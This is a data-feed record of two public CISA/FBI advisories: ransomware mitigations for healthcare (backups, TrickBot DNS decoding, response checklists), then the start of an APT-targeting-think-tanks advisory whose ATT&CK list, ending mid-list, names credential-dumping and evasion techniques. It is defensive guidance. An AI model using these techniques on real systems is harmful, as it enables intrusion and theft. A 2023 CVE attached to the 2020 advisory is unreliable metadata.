practices, the FBI, CISA and HHS also recommend the following:\n\n * Regularly back up data, air gap, and password protect backup copies offline.\n * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.\n\n#### User Awareness Best Practices\n\n * Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats\u2014such as ransomware and phishing scams\u2014and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.\n * Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.\n\n#### Recommended Mitigation Measures\n\nSystem administrators who have indicators of a TrickBot network compromise should immediately take steps to back up and secure sensitive or proprietary data. TrickBot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly. Upon evidence of a TrickBot infection, review DNS logs and use the `XOR` key of `0xB9` to decode `XOR` encoded DNS requests to reveal the presence of `Anchor_DNS`, and maintain and provide relevant logs.\n\n### GENERAL RANSOMWARE MITIGATIONS \u2014 HPH SECTOR\n\nThis section is based on CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC)'s Joint Ransomware Guide, which can be found at <https://www.cisa.gov/publication/ransomware-guide>.\n\nCISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.\n\n#### Ransomware Prevention\n\n#### _Join and Engage with Cybersecurity Organizations_\n\nCISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:\n\n * Join a healthcare information sharing organization, H-ISAC: \n * Health Information Sharing and Analysis Center (H-ISAC): <https://h-isac.org/membership-account/join-h-isac/>\n * Sector-based ISACs - National Council of ISACs: <https://www.nationalisacs.org/member-isacs>\n * Information Sharing and Analysis Organization (ISAO) Standards Organization: <https://www.isao.org/information-sharing-groups/>\n * Engage with CISA and FBI, as well as HHS\u2014through the HHS Health Sector Cybersecurity Coordination Center (HC3)\u2014to build a lasting partnership and collaborate on information sharing, best practices, assessments, and exercises. \n * CISA: [cisa.gov](<cisa.gov>), <https://us-cert.cisa.gov/mailing-lists-and-feeds>, [central@cisa.gov](<central@cisa.gov>)\n * FBI: [ic3.gov](<ic3.gov>), [www.fbi.gov/contact-us/field](<www.fbi.gov/contact-us/field>), [CyWatch@fbi.gov](<www.fbi.gov/contact-us/field>)\n * HHS/HC3: <http://www.hhs.gov/hc3>, [HC3@HHS.gov](<HC3@HHS.gov>)\n\nEngaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.\n\n#### _Follow Ransomware Best Practices_\n\nRefer to the best practices and references below to help manage the risk posed by ransomware and support your organization\u2019s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.\n\n * It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization. \n * Use the 3-2-1 rule as a guideline for backup practices. The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.\n * Maintain regularly updated \u201cgold images\u201d of critical systems in the event they need to be rebuilt. This entails maintaining image \u201ctemplates\u201d that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.\n * Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred. \n * Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.\n * Ensure all backup hardware is properly patched.\n * In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.\n * Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident. \n * Review available incident response guidance, such as CISA\u2019s Technical Approaches to Uncovering and Remediating Malicious Activity <https://us-cert.cisa.gov/ncas/alerts/aa20-245a>.\n * Help your organization better organize around cyber incident response.\n * Develop a cyber incident response plan.\n * The Ransomware Response Checklist, available in the [CISA and MS-ISAC Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>), serves as an adaptable, ransomware- specific annex to organizational cyber incident response or disruption plans.\n * Review and implement as applicable MITRE\u2019s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (<https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf>).\n * Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.\n * Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following: \n * Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.\n * Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.\n * Coordinate the potential for surge support with other healthcare facilities in the greater local area. This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant amount of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.\n * Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if the primary network becomes unavailable if/when needed.\n * Predefine network segments, IT capabilities and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.\n * Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.\n * See [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.\n * HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at <http://www.hhs.gov/hc3>.\n\n#### _Hardening Guidance_\n\n * The Food and Drug Administration provides multiple guidance documents regarding the hardening of healthcare and specifically medical devices found here: <https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity>.\n * See [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for additional in-depth hardening guidance.\n\n#### _Contact CISA for These No-Cost Resources_\n\n * Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.\n * Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: <https://www.cisa.gov/cyber-resource-hub>. \n * Assessments include Vulnerability Scanning and Phishing Campaign Assessment.\n * Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.\n * CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.\n * Contacts: \n * SLTT organizations: [CyberLiaison_SLTT@cisa.dhs.gov](<CyberLiaison_SLTT@cisa.dhs.gov>)\n * Private sector organizations: [CyberLiaison_Industry@cisa.dhs.gov](<CyberLiaison_Industry@cisa.dhs.gov>)\n\n#### _Ransomware Quick References_\n\n * _Ransomware: What It Is and What to Do About It _(CISA): General ransomware guidance for organizational leadership and more in-depth information for CISOs and technical staff: [https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_ Document-FINAL.pdf](<https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_%20Document-FINAL.pdf>)\n * Ransomware (CISA): Introduction to ransomware, notable links to CISA products on protecting networks, specific ransomware threats, and other resources: <https://www.us-cert.cisa.gov/Ransomware>\n * HHS/HC3: Ransomware that impacts HPH is tracked by the HC3 and can be found at [www.hhs.gov/hc3](<www.hhs.gov/hc3>)\n * _Security Primer \u2013 Ransomware_ (MS-ISAC): Outlines opportunistic and strategic ransomware campaigns, common infection vectors, and best practice recommendations: <https://www.cisecurity.org/white-papers/security-primer-ransomware/>\n * _Ransomware: Facts, Threats, and Countermeasures _(MS- ISAC): Facts about ransomware, infection vectors, ransomware capabilities, and how to mitigate the risk of ransomware infection: [https://www.cisecurity.org/blog/ransomware- facts-threats-and-countermeasures/](<https://www.cisecurity.org/blog/ransomware-%20facts-threats-and-countermeasures/>)\n * HHS Ransomware Fact Sheet: <https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf>\n * NIST Securing Data Integrity White Paper: <https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft>\n\n#### Ransomware Response Checklist\n\n**Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. CISA, FBI, and HHS do not recommend paying ransom.**\n\nShould your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>), which contains steps for detection and analysis as well as containment and eradication.\n\n#### _Consider the Need For Extended Identification or Analysis_\n\nIf extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:\n\n * Recovered executable file\n * Copies of the readme file \u2013 DO NOT REMOVE the file or decryption may not be possible\n * Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)\n * Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)\n * Malware samples\n * Names of any other malware identified on your system\n * Encrypted file samples\n * Log files (Windows Event Logs from compromised systems, Firewall logs, etc.)\n * Any PowerShell scripts found having executed on the systems\n * Any user accounts created in Active Directory or machines added to the network during the exploitation\n * Email addresses used by the attackers and any associated phishing emails\n * A copy of the ransom note\n * Ransom amount and whether or not the ransom was paid\n * Bitcoin wallets used by the attackers\n * Bitcoin wallets used to pay the ransom (if applicable)\n * Copies of any communications with attackers\n\nUpon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.\n\n * CISA \u2013 Advanced Malware Analysis Center: <https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf>\n * Remote Assistance \u2013 Request via [Central@cisa.gov](<Central@cisa.gov>)\n\n### Contact Information\n\nCISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for purpose of notification.\n\n * State and Local Response Contacts\n * IT/IT Security Team \u2013 Centralized Cyber Incident Reporting\n * State and Local Law Enforcement\n * Fusion Center \n * Managed/Security Service Providers\n * Cyber Insurance \n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<Central@cisa.dhs.gov>).\n\nAdditionally, see [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for information on contacting\u2014and what to expect from contacting\u2014federal asset response and federal threat response contacts.\n\n### _Disclaimer_\n\nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see <https://cisa.gov/tlp>.\n\n### References\n\n[CISA Emergency Services Sector Continuity Planning Suite ](<https://www.cisa.gov/emergency-services-sector-continuity-planning-suite>)\n\n[CISA MS-ISAC Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>)\n\n[CISA Tip: Avoiding Social Engineering and Phishing Attacks](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)\n\n[FBI PSA: \u201cHigh-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations\"](<https://www.ic3.gov/media/2019/191002.aspx>)\n\n[Health Industry Cybersecurity Tactical Crisis Response](<https://healthsectorcouncil.org/hic-tcr/>)\n\n[Health Industry Cybersecurity Practices (HICP) ](<http://www.phe.gov/405d>)\n\n[HHS - Ransomware Spotlight Webinar ](<https://protect2.fireeye.com/url?k=661c55bd-3a495cae-661c6482-0cc47adb5650-bb09b09e1017f10b&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=99373fd9c7&e=7882426b51>)\n\n[HHS - Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients](<https://protect2.fireeye.com/url?k=b43c8fe1-e86986f2-b43cbede-0cc47adb5650-84218742b50e2b7e&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=3d453bb6fe&e=7882426b51>)\n\n[HHS - Ransomware Briefing ](<https://protect2.fireeye.com/url?k=6a477b44-36127257-6a474a7b-0cc47adb5650-f6c92a4c247070ec&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=071616ff3e&e=7882426b51>)\n\n[HHS - Aggressive Ransomware Impacts](<https://protect2.fireeye.com/url?k=fe80c15e-a2d5c84d-fe80f061-0cc47adb5650-2206dbc55c13f1de&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=ebb762e019&e=7882426b51>)\n\n[HHS - Ransomware Fact Sheet](<https://protect2.fireeye.com/url?k=2923cea5-7576c7b6-2923ff9a-0cc47adb5650-26d7a0932fe07e31&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=107ba38369&e=7882426b51>)\n\n[HHS - Cyber Attack Checklist](<https://protect2.fireeye.com/url?k=08e10c16-54b40505-08e13d29-0cc47adb5650-70b9e6fd13ea4f2d&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=bcc423d21d&e=7882426b51>)\n\n[HHS - Cyber-Attack Response Infographic](<https://protect2.fireeye.com/url?k=8497e505-d8c2ec16-8497d43a-0cc47adb5650-ba5cee20bcf28bab&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=dc2b43974c&e=7882426b51>)\n\n[NIST - Data Integrity Publication](<https://protect2.fireeye.com/url?k=0be33d8b-57b63498-0be30cb4-0cc47adb5650-be7b920b52ab7927&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=c89bf12fa8&e=7882426b51>)\n\n[NIST - Guide for Cybersecurity Event Recovery](<https://protect2.fireeye.com/url?k=5335b9d4-0f60b0c7-533588eb-0cc47adb5650-bbc2d82317c6bc45&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=eeb05487cf&e=7882426b51>)\n\n[NIST - Identifying and Protecting Assets Against Ransomware and Other Destructive Events ](<https://protect2.fireeye.com/url?k=348a7900-68df7013-348a483f-0cc47adb5650-5210c734b99339b1&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=9f0f789411&e=7882426b51>)\n\n[NIST - Detecting and Responding to Ransomware and Other Destructive Events ](<https://protect2.fireeye.com/url?k=daf6be91-86a3b782-daf68fae-0cc47adb5650-1f4f5f947a590fa0&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=958743a29c&e=7882426b51>)\n\n[NIST - Recovering from Ransomware and Other Destructive Events ](<https://protect2.fireeye.com/url?k=90b40d5e-cce1044d-90b43c61-0cc47adb5650-bab63aa79a2b0b2a&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=4947ff3a54&e=7882426b51>)\n\n[Github List of IOCs](<https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456>)\n\n### Revisions\n\nOctober 28, 2020: Initial version|October 29, 2020: Updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection|November 2, 2020: Updated FBI link\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2020-11-02T12:00:00", "type": "ics", "title": "Ransomware Activity Targeting the Healthcare and Public Health Sector", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2020-11-02T12:00:00", "id": "AA20-302A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:04:00", "description": "### Summary\n\n_This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have observed persistent continued cyber intrusions by advanced persistent threat (APT) actors targeting U.S. think tanks. This malicious activity is often, but not exclusively, directed at individuals and organizations that focus on international affairs or national security policy.[[1](<https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/>)] The following guidance may assist U.S. think tanks in developing network defense procedures to prevent or rapidly detect these attacks.\n\nAPT actors have relied on multiple avenues for initial access. These have included low-effort capabilities such as spearphishing emails and third-party message services directed at both corporate and personal accounts, as well as exploiting vulnerable web-facing devices and remote connection capabilities. Increased telework during the COVID-19 pandemic has expanded workforce reliance on remote connectivity, affording malicious actors more opportunities to exploit those connections and to blend in with increased traffic. Attackers may leverage virtual private networks (VPNs) and other remote work tools to gain initial access or persistence on a victim\u2019s network. When successful, these low-effort, high-reward approaches allow threat actors to steal sensitive information, acquire user credentials, and gain persistent access to victim networks.\n\nGiven the importance that think tanks can have in shaping U.S. policy, CISA and FBI urge individuals and organizations in the international affairs and national security sectors to immediately adopt a heightened state of awareness and implement the critical steps listed in the Mitigations section of this Advisory.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf>) for a PDF version of this report.\n\n### Technical Details\n\n#### ATT&amp;CK Profile\n\nCISA created the following MITRE ATT&amp;CK profile to provide a non-exhaustive list of tactics, techniques, and procedures (TTPs) employed by APT actors to break through think tanks\u2019 defenses, conduct reconnaissance in their environments, exfiltrate proprietary or confidential information, and execute effects on targets. These TTPs were included based upon closed reporting on APT actors that are known to target think tanks or based upon CISA incident response data.\n\n * _**Initial Access**_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001>)] \n * Valid Accounts [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]\n * Valid Accounts: Cloud Accounts [[T1078.004](<https://attack.mitre.org/versions/v7/techniques/T1078/004/>)]\n * External Remote Services [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]\n * Drive-by Compromise [[T1189](<https://attack.mitre.org/versions/v7/techniques/T1189>)]\n * Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)] \n * Supply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v7/techniques/T1195/002>)]\n * Trusted Relationship [[T1199](<https://attack.mitre.org/versions/v7/techniques/T1199>)]\n * Phishing: Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001>)]\n * Phishing: Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)]\n * Phishing: Spearphishing via Service [[T1566.003](<https://attack.mitre.org/versions/v7/techniques/T1566/003>)]\n * _**Execution**_ [[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002>)] \n * Windows Management Instrumentation [[T1047](<https://attack.mitre.org/versions/v7/techniques/T1047>)]\n * Scheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v7/techniques/T1053/005>)]\n * Command and Scripting Interpreter: PowerShell [[T1059.001](<https://attack.mitre.org/versions/v7/techniques/T1059/001>)]\n * Command and Scripting Interpreter: Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003>)]\n * Command and Scripting Interpreter: Unix Shell [[T1059.004](<https://attack.mitre.org/versions/v7/techniques/T1059/004>)]\n * Command and Scripting Interpreter: Visual Basic [[T1059.005](<https://attack.mitre.org/versions/v7/techniques/T1059/005>)]\n * Command and Scripting Interpreter: Python [[T1059.006](<https://attack.mitre.org/versions/v7/techniques/T1059/006>)]\n * Native API [[T1106](<https://attack.mitre.org/versions/v7/techniques/T1106>)]\n * Exploitation for Client Execution [[T1203](<https://attack.mitre.org/versions/v7/techniques/T1203>)]\n * User Execution: Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001>)]\n * User Execution: Malicious File [[T1204.002](<https://attack.mitre.org/versions/v7/techniques/T1204/002>)]\n * Inter-Process Communication: Dynamic Data Exchange [[T1559.002](<https://attack.mitre.org/versions/v7/techniques/T1559/002/>)]\n * System Services: Service Execution [[T1569.002](<https://attack.mitre.org/versions/v7/techniques/T1569/002>)]\n * _**Persistence**_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003>)] \n * Boot or Logon Initialization Scripts: Logon Script (Windows) [[T1037.001](<https://attack.mitre.org/versions/v7/techniques/T1037/001>)]\n * Scheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v7/techniques/T1053/005>)]\n * Account Manipulation: Exchange Email Delegate Permissions [[T1098.002](<https://attack.mitre.org/versions/v7/techniques/T1098/002>)]\n * Create Account: Local Account [[T1136.001](<https://attack.mitre.org/versions/v7/techniques/T1136/001>)]\n * Office Application Startup: Office Test [[T1137.002](<https://attack.mitre.org/versions/v7/techniques/T1137/002>)]\n * Office Application Startup: Outlook Home Page [[T1137.004](<https://attack.mitre.org/versions/v7/techniques/T1137/004>)]\n * Browser Extensions [[T1176](<https://attack.mitre.org/versions/v7/techniques/T1176>)]\n * BITS Jobs [[T1197](<https://attack.mitre.org/versions/v7/techniques/T1197/>)]\n * Server Software Component: Web Shell [[T1505.003](<https://attack.mitre.org/versions/v7/techniques/T1505/003>)]\n * Pre-OS Boot: Bootkit [[T1542.003](<https://attack.mitre.org/versions/v7/techniques/T1542/003/>)]\n * Create or Modify System Process: Windows Service [[T1543.003](<https://attack.mitre.org/versions/v7/techniques/T1543/003>)]\n * Event Triggered Execution: Change Default File Association [[T1546.001](<https://attack.mitre.org/versions/v7/techniques/T1546/001>)]\n * Event Triggered Execution: Windows Management Instrumentation Event Subscription [[T1546.003](<https://attack.mitre.org/versions/v7/techniques/T1546/003>)]\n * Event Triggered Execution: Accessibility Features [[T1546.008](<https://attack.mitre.org/versions/v7/techniques/T1546/008>)]\n * Event Triggered Execution: Component Object Model Hijacking [[T1546.015](<https://attack.mitre.org/versions/v7/techniques/T1546/015>)]\n * Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001>)]\n * Boot or Logon Autostart Execution: Shortcut Modification [[T1547.009](<https://attack.mitre.org/versions/v7/techniques/T1547/009>)]\n * _**Privilege Escalation**_ [[TA0004](<https://attack.mitre.org/versions/v7/tactics/TA0004>)] \n * Process Injection [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055>)]\n * Process Injection: Process Hollowing [[T1055.012](<https://attack.mitre.org/versions/v7/techniques/T1055/012>)]\n * Exploitation for Privilege Escalation [[T1068](<https://attack.mitre.org/versions/v7/techniques/T1068>)]\n * Access Token Manipulation: Token Impersonation/Theft [[T1134.001](<https://attack.mitre.org/versions/v7/techniques/T1134/001>)]\n * Event Triggered Execution: Accessibility Features [[T1546.008](<https://attack.mitre.org/versions/v7/techniques/T1546/008>)]\n * Boot or Logon Autostart Execution: Shortcut Modification [[T1547.009](<https://attack.mitre.org/versions/v7/techniques/T1547/009>)]\n * Abuse Elevation Control Mechanism: Bypass User Access Control [[T1548.002](<https://attack.mitre.org/versions/v7/techniques/T1548/002>)]\n * Hijack Execution Flow: DLL Side-Loading [[T1574.002](<https://attack.mitre.org/versions/v7/techniques/T1574/002>)]\n * _**Defense Evasion**_ [[TA0005](<https://attack.mitre.org/versions/v7/tactics/TA0005>)] \n * Rootkit [[T1014](<https://attack.mitre.org/versions/v7/techniques/T1014>)]\n * Obfuscated Files or Information: Binary Padding [[T1027.001](<https://attack.mitre.org/versions/v7/techniques/T1027/001>)]\n * Obfuscated Files or Information: Software Packing [[T1027.002](<https://attack.mitre.org/versions/v7/techniques/T1027/002>)]\n * Obfuscated Files or Information: Steganography [[T1027.003](<https://attack.mitre.org/versions/v7/techniques/T1027/003>)]\n * Obfuscated Files or Information: Indicator Removal from Tools [[T1027.005](<https://attack.mitre.org/versions/v7/techniques/T1027/005>)]\n * Masquerading: Match Legitimate Name or Location [[T1036.005](<https://attack.mitre.org/versions/v7/techniques/T1036/005>)]\n * Indicator Removal on Host: Clear Windows Event Logs [[T1070.001](<https://attack.mitre.org/versions/v7/techniques/T1070/001>)]\n * Indicator Removal on Host: Clear Command History [[1070.003](<https://attack.mitre.org/versions/v7/techniques/T1070/003>)]\n * Indicator Removal on Host: File Deletion [[T1070.004](<https://attack.mitre.org/versions/v7/techniques/T1070/004>)]\n * Indicator Removal on Host: Timestomp [[T1070.006](<https://attack.mitre.org/versions/v7/techniques/T1070/006>)]\n * Modify Registry [[T1112](<https://attack.mitre.org/versions/v7/techniques/T1112>)]\n * Deobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v7/techniques/T1140>)]\n * Exploitation for Defense Evasion [[T1211](<https://attack.mitre.org/versions/v7/techniques/T1211>)]\n * Signed Binary Proxy Execution: Compiled HTML File [[T1218.001](<https://attack.mitre.org/versions/v7/techniques/T1218/001>)]\n * _Signed Binary Proxy Execution: Mshta_ [[T1218.005](<https://attack.mitre.org/versions/v7/techniques/T1218/005>)]\n * Signed Binary Proxy Execution:_ Rundll32 _[[T1218.011](<https://attack.mitre.org/versions/v7/techniques/T1218/011>)]\n * Template Injection [[T1221](<https://attack.mitre.org/versions/v7/techniques/T1221>)]\n * Execution Guardrails: Environmental Keying [[T1480.001](<https://attack.mitre.org/versions/v7/techniques/T1480/001>)]\n * Abuse Elevation Control Mechanism: Bypass User Access Control [[T1548.002](<https://attack.mitre.org/versions/v7/techniques/T1548/002>)]\n * Use Alternate Authentication Material: Application Access Token [[T1550.001](<https://attack.mitre.org/versions/v7/techniques/T1550/001>)]\n * Subvert Trust Controls: Code Signing [[T1553.002](<https://attack.mitre.org/versions/v7/techniques/T1553/002>)]\n * Impair Defenses: Disable or Modify Tools [[T1562.001](<https://attack.mitre.org/versions/v7/techniques/T1562/001>)]\n * Impair Defenses: Disable or Modify System Firewall [[T1562.004](<https://attack.mitre.org/versions/v7/techniques/T1562/004>)]\n * Hide Artifacts: Hidden Files and Directories [[T1564.001](<https://attack.mitre.org/versions/v7/techniques/T1564/001>)]\n * Hide Artifacts: Hidden Window [[T1564.003](<https://attack.mitre.org/versions/v7/techniques/T1564/003>)]\n * _**Credential Access**_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006>)] \n * OS Credential Dumping: LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001>)]\n * OS Credential Dumping: Security Account Manager [[T1003.002](<https://attack.mitre.org/versions/v7/techniques/T1003/002>)]\n * OS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v7/techniques/T1003/003>)]\n * OS Credential Dumping: LSA Secrets [[T1003.004](<https://attack.mitre.org/versions/v7/techniques/T1003/004>)]\n * OS Credential Dumping: Cached Domain Credentials [[T1003.005](<https://attack.mitre.org/versions/v7/techniques/T1003/005>)]\n * Network Sniffing [[T1040](<https://attack.mitre.org/versions/v7/techniques/T1040>)]\n * Input Capture: Keylogging [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001>)]\n * Brute Force: Password Cracking [[T1110.002](<https://attack.mitre.org/versions/v7/techniques/T1110/002>)]Brute Force: Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v7/techniques/T1110/003>)]\n * Forced Authentication [[T1187](<https://attack.mitre.org/versions/v7/techniques/T1187>)]\n * Steal Application Access Token [[T1528](<https://attack.mitre.org/versions/v7/techniques/T1528>)]\n * Unsecured Credentials: Credentials in Files [[T1552.001](<https://attack.mitre.org/versions/v7/techniques/T1552/001>)]\n * Unsecured Credentials: Group Policy Preferences [[T1552.006](<https://attack.mitre.org/versions/v7/techniques/T1552/006>)]\n * Credentials from Password Stores: Credentials from Web Browsers [[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003>)]\n * _**Discovery**_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007>)] \n * System Service Discovery [[T1007](<https://attack.mitre.org/versions/v7/techniques/T1007>)]\n * Query Registry [[T1012](<https://attack.mitre.org/versions/v7/techniques/T1012>)]\n * System Network Configuration Discovery 